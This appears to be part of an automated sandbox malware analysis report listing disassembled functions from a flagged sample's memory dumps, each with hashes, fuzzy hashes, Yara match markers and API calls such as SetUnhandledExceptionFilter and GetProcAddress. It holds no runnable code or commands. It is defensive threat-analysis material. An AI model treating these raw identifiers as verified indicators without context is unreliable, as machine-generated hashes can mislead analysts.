                                            • Instruction ID: 5bcf9fd90164e7ff1602427bca0bed587a5bb36a9d426d5c8fdac6ccf5812400
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 72B16C71520A08CFD715CF28C48ABE57BE0FF85364F258659E8A9CF2A1C339D992CB45
                                            Function 04B4794E Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                            • Instruction ID: 7d5270c74d0c22de9566dd6ad06e93c3e1c28eeb8d0c1353f3c6603a7e280fcb
                                            • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                            • Instruction Fuzzy Hash: 9D41A4B5805219AEDB20DFA9CC88AEABBB9EF85304F1442D9E40993200DB35AE45DF50
                                            Function 004176E7 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                            • Instruction ID: d43d4b044ad22829e063f8950bf7820e76fddff19cb0b58812960860f3569e8b
                                            • Opcode Fuzzy Hash: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                                            • Instruction Fuzzy Hash: 7F41B4B5D04219AEDB20DF69CC89AEABBB9AF44304F1442DEE41DD3241DA389E85CF14
                                            Function 10007EA9 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                            • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                            • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                            • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                            Function 04B3F130 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction ID: 076d3828bbbeb0424ef2766bb0bbedd3274cc23aa9e6c84a5993f972b3557824
                                            • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction Fuzzy Hash: 07C1F074E00A06DFDF24CFAEC984ABABBB1FF05306F144699E852976A1D731B905CB50
                                            Function 04CFE2C9 Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction ID: b1986ee4ad245422d219de327588501476d25a33a323744dc858d4c69d437f4d
                                            • Opcode Fuzzy Hash: 8eb8cff735118d4cdf18e48b5e4fd70e4005089286b1f543a5e77019ad8e0901
                                            • Instruction Fuzzy Hash: 38C1F5706006068FDBA8CF68CD8867ABBB3AF05304F18461DD756976B1E339FA49CB51
                                            Function 04B3EDEE Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction ID: 74243ebc2aacd969b11ddea7da5755fc2bd07344a950475f47cab79aaa9ff649
                                            • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction Fuzzy Hash: F5B1E270E0061A9BEB24CF6EC954ABEBBB1EF44306F040A9FE55297690D771FA01CB51
                                            Function 04CFDF87 Relevance: 1.6, Strings: 1, Instructions: 318COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0
                                            • API String ID: 0-4108050209
                                            • Opcode ID: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction ID: 3d672d97bde1181362a480de4a7d63033b857b6a64f134cb7eb0bbaff51d913b
                                            • Opcode Fuzzy Hash: 879cce724f58335765498cd27df84c01b4e50fca817c5947501d6afb968e75ec
                                            • Instruction Fuzzy Hash: 66B11634A0060A9BDBA48E69CD54ABEB7B3AF04304F08461DDB5397AB1D73DB701DB51
                                            Function 04B3A947 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(0040A6EC,04B3A2CB), ref: 04B3A94C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                            • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction Fuzzy Hash:
                                            Function 0040A6E0 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0000A6EC,0040A064), ref: 0040A6E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled
                                            • String ID:
                                            • API String ID: 3192549508-0
                                            • Opcode ID: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction ID: 6de328abc9b99a616df872271d62a2f30248adc2819e8ef2996fe7ca66473f4a
                                            • Opcode Fuzzy Hash: 57eb909cc499ab73dfbd1e7bda14dcacb44b248db614b08e85bbc339297afc36
                                            • Instruction Fuzzy Hash:
                                            Function 00956C03 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Azn
                                            • API String ID: 0-635255714
                                            • Opcode ID: e796af260af6b46424eaa30851a988f9174b2d58a009631cdc37de3c620af7cf
                                            • Instruction ID: cc5b9becf4712406c76289c382f475036c1d886ddb4982f5d1554bb8b3c25451
                                            • Opcode Fuzzy Hash: e796af260af6b46424eaa30851a988f9174b2d58a009631cdc37de3c620af7cf
                                            • Instruction Fuzzy Hash: 4B71F4F3D082109FE314AE28DC8576AB7E5EB94320F17463DDAC997384EA7A5C058786
                                            Function 00825BEA Relevance: 1.5, Strings: 1, Instructions: 213COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: NTDL
                                            • API String ID: 0-3662016964
                                            • Opcode ID: 34aa3a87c1d55d37ca58f0d6a3c489fd62e42fb50899ddec8ad0917eab23b5ea
                                            • Instruction ID: efcd6fca2d320b5af11fb7fba069c406112f61ac8720c4b43931d136f20f2c2d
                                            • Opcode Fuzzy Hash: 34aa3a87c1d55d37ca58f0d6a3c489fd62e42fb50899ddec8ad0917eab23b5ea
                                            • Instruction Fuzzy Hash: BC513876184A2F9BCB15CE74E5051EE7BE1FB43330B30412AE842D7A02E7724D82DB59
                                            Function 0086D065 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Y{
                                            • API String ID: 0-2887445246
                                            • Opcode ID: 85b5c864530c971e35fcaf1bdf678bb4f545a81b1118d00f1b7ae7ede8e9f7c7
                                            • Instruction ID: 43ce399a64652272871410fc75a7b61595072dbd29c493aea53c416392272302
                                            • Opcode Fuzzy Hash: 85b5c864530c971e35fcaf1bdf678bb4f545a81b1118d00f1b7ae7ede8e9f7c7
                                            • Instruction Fuzzy Hash: 372136F3E182284FE308AAB8DCA53B7B7D9DB54211F16453DDE46E7384E8719C0482D1
                                            Function 04D05219 Relevance: .6, Instructions: 637COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction ID: e42d35f055ba6fdcd0a1a0af7e9804b4cd627a437853820cb6e1a68b715b958d
                                            • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction Fuzzy Hash: CE323321E29F015DD7238A35E932335A688AFB73D4F55C737EC1AB69A5EB28D0834500
                                            Function 00415E19 Relevance: .6, Instructions: 637COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction ID: cacb134cf45b6d3893a07543428c3496bc224f7c3d1c732b13d01dd1be495d2a
                                            • Opcode Fuzzy Hash: bed945026c03525ca9e6f99888b728c839f34034abb34f6e91111b4f97e8ed69
                                            • Instruction Fuzzy Hash: DF323631E29F015DD7239A35D922336A649AFB73C4F56C737E815B5AA9EF28C4C34108
                                            Function 00829ABA Relevance: .5, Instructions: 467COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac6b90ad7751f712fdde7beebfc13583e3eb28ac5d6b4f7dfb42aa8ab6d55719
                                            • Instruction ID: 97fba0bbca0d30bbc258951721acc79fa607aeb1195914c2836370d3f28179f6
                                            • Opcode Fuzzy Hash: ac6b90ad7751f712fdde7beebfc13583e3eb28ac5d6b4f7dfb42aa8ab6d55719
                                            • Instruction Fuzzy Hash: 48E1B1B3F046214BF3448E29DC94366B6D2EBD5320F2A863DDA89A77C8D97E5C058385
                                            Function 04D04AEE Relevance: .3, Instructions: 269COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction ID: c8a6b38cdc1098edeeaf129ab7740c5ef43b9d99dae37acfc95c94745e411324
                                            • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                                            • Instruction Fuzzy Hash: 51B137316106099FD719CF28C48AB657BE0FF45364F29C698E99ACF2E1C335E992CB40
                                            Function 008C3959 Relevance: .2, Instructions: 206COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db7f8deee30b6e898701c1ebdf187f014650636cbb355e1c780366e5d457f75e
                                            • Instruction ID: 5c11d191f112f7c148f1e3fbb0e5c75531660717dbae7f708017d42bcbac3be7
                                            • Opcode Fuzzy Hash: db7f8deee30b6e898701c1ebdf187f014650636cbb355e1c780366e5d457f75e
                                            • Instruction Fuzzy Hash: 7A51B0F3618604AFF3046E2DDCC5B7ABBD9EB94320F1A463DEBC587780D97529008696
                                            Function 0082615C Relevance: .2, Instructions: 204COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 752b03af3c7c41b96c2fa90b3a29a888cd11c536c108f9c107cfcd50047bff29
                                            • Instruction ID: 51eab8f97b33b2063638d87aeadde8f312555be1e9cea514dc0db600d6898b07
                                            • Opcode Fuzzy Hash: 752b03af3c7c41b96c2fa90b3a29a888cd11c536c108f9c107cfcd50047bff29
                                            • Instruction Fuzzy Hash: C36167F7F1152547F314493ACD583A22A839BD5320F3F82788B9C6BBC9D8BE5D0A5284
                                            Function 00915F7D Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8655e6867b769fd62e0aa45627b9e096c71fcc8fa063dfba5decad1863fd4031
                                            • Instruction ID: 453ef5fcecdbc0f3fa7d4a0d423d65065929adde0a3971461912ea4e9a06e447
                                            • Opcode Fuzzy Hash: 8655e6867b769fd62e0aa45627b9e096c71fcc8fa063dfba5decad1863fd4031
                                            • Instruction Fuzzy Hash: 8C5104B3E083345BE310AE69DC5477AF7D9EBD0720F1B853EDA9897280EA745C0186C6
                                            Function 04CF96AC Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction ID: d0df103da5b9bac1177086f3a7303a90b6f901318e53e55c1934d55f851e32c2
                                            • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                                            • Instruction Fuzzy Hash: 63516BB1E00705CFDB24CF95D881BAAB7F1FB48304F64802AC605EB260D379AA41CF99
                                            Function 04B3B8F7 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: a9acc874ecb0f5199fb84964ad310363d56d86cc6c632ddcc042beb498c3c323
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: F211277724804247D6548A6FD4F86B6F395EBE532BB2C43FAD0858F75FD222B144D600
                                            Function 04CFAA90 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000003.2228465890.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_3_4cf0000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: afae683734610caaa56b191e9f0799064e87d161038e498cc0cdf45931de0ef6
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: C911087720014143D689CA2EDDF86F7E7D7EBC532072D837AD24A4B758D12BB249AE00
                                            Function 0040B690 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: b545b07da7e7745530abcd8f67b80a540579b97e0dd86f1b90800f2e494ad7bb
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: F1115B7720004243D604862DCDF45BBA395EBC5320B2C477BD0516BBD4D33BD841968D
                                            Function 100102A0 Relevance: .1, Instructions: 76COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction ID: 6858cf0c51ff5caabfc3a7f957f7e97cc4d55c404d013567cdc706fa4bfc5bf2
                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                            • Instruction Fuzzy Hash: 5111087774118243D681C56DC4F86ABA3DEFBC52A0729436AF0D28FA58D2F2DAC5A600
                                            Function 00825DC7 Relevance: .1, Instructions: 65COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922575318.0000000000822000.00000040.00000001.01000000.00000003.sdmp, Offset: 00822000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_822000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 39d12d3348acbb43342affe199c22b62551e890e5d2b06635da3d9f784576d0c
                                            • Instruction ID: a017bae09b531abec47085a0347082e6a37e084aa1c8e4a7f035d436f8956512
                                            • Opcode Fuzzy Hash: 39d12d3348acbb43342affe199c22b62551e890e5d2b06635da3d9f784576d0c
                                            • Instruction Fuzzy Hash: 8901C23E0C8A2F6FCB028EB479050EABF95FE433347310515E942D6413D3710F466241
                                            Function 00F0C96B Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F0C000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_f0c000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction ID: 5d44b8f1167879dc54b60056c41cacb5695aafa838e227afafbac9870dadeab1
                                            • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                            • Instruction Fuzzy Hash: 87117C72340100AFD744DF59DCC1FA677EAEB89330B298165ED08CB396D679E801E7A0
                                            Function 04B30D90 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4b30000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction ID: ad6c9417b8aa8b9db5240ebe6141aa7bacc950b144225d8a011904ef37c12727
                                            • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                            • Instruction Fuzzy Hash: BD01A276B006148FDF21EF25C804BAA33E5FFC6217F4548E5E90A9B289E774B9418B90
                                            Function 10007A76 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2926843521.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2926786088.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926866070.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2926885397.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                            • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                            • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                            Function 00409B9D Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409B7B), ref: 00409BA9
                                            • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409B7B), ref: 00409BB4
                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409B7B), ref: 00409BC5
                                            • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409BD7
                                            • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409BE5
                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409B7B), ref: 00409C08
                                            • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409B7B), ref: 00409C24
                                            • CloseHandle.KERNEL32(00000000,?,?,00409B7B), ref: 00409C34
                                            Strings
                                            • kernel32.dll, xrefs: 00409BC0
                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BAF
                                            • SleepConditionVariableCS, xrefs: 00409BD1
                                            • WakeAllConditionVariable, xrefs: 00409BDD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2922390836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                            • API String ID: 2565136772-3242537097
                                            • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction ID: 37dafa969150eeb09f2d68ad9d46abae469e8d92b579355ddc2ecf38041403ba
                                            • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                                            • Instruction Fuzzy Hash: 4B017531F44721BBE7205BB4BC09F563AE8AB48715F544032F905E22A2DB78CC078A6C
                                            Function 1000A001 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • ___free_lconv_mon.LIBCMT ref: 1000A045
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                              • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
